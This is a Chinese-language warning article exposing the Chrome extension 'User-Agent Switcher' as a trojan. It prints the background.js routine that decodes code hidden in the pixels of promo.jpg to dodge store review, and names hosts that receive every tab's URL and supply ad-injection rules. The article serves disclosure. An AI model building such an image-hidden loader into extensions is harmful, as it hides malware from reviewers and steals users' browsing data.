chrome 商店搜索 User-Agent Switcher,排第一的這個插件(45 萬用戶),是一個木馬...

這款插件的表面功能是使Chrome可以轉換為別的瀏覽器進行訪問,如IE、Safari、360甚至iOS、 Android等移動瀏覽器,方便用戶進行測試。此外,User-Agent Switcher還可以修改瀏覽器的UA,支持自動切換模式,讓Chrome始終用指定的UA去訪問某些網站。

但是,這款插件其實是一個包含惡意代碼的木馬程序。打開谷歌應用商店(插件地址),可以看到其用戶數超過45萬人,截至發稿共有1300多名用戶對其進行了評價,平均評分4.38顆星。

  • 插件鏈接:User-Agent Switcher

為了繞過 chrome 的審核策略,作者把惡意代碼隱藏在了 promo.jpg 里。

background.js 的第 80 行,從這個圖片里解密出惡意代碼並執行

t.prototype.Vh = function(t, e) {
if ("" === ../promo.jpg) return "";
void 0 === t && (t = ../promo.jpg), t.length && (t = r.Wk(t)), e = e || {};
var n = this.ET,
i = e.mp || n.mp,
o = e.Tv || n.Tv,
h = e.At || n.At,
a = r.Yb(Math.pow(2, i)),
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement("canvas"),
p = u.getContext("2d");
i f (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
var c = p.getImageData(0, 0, u.width, u.height),
d = c.data,
g = [];
i f (c.data.every(function(t) {
return 0 === t
})) return "";
var m, s;
i f (1 === o)
for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
var v = "",
w = 0,
y = 0,
l = Math.pow(2, h) - 1;
for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += S tring.f romCharCode(w & l), y %= h, w = g[m] >> i - y);
r eturn v.length < 13 ? "" : (0 !== w && (v += S tring.f romCharCode(w & l)), v)
}

它會把你打開的每個 tab 的 url 等信息加密發送到 https://uaswitcher.org/logic/page/data

另外還會從 api.data-monitor.info/a 獲取推廣鏈接的規則,打開符合規則的網站時,會在頁面插入廣告甚至惡意代碼.

據悉,該作者還在谷歌應用商店發布了如下幾個插件,其安全性同樣值得懷疑:

  • chrome.google.com/webst
  • chrome.google.com/webst
  • chrome.google.com/webst
  • chrome.google.com/webst

文章參考自:V2EX

推薦閱讀:

相关文章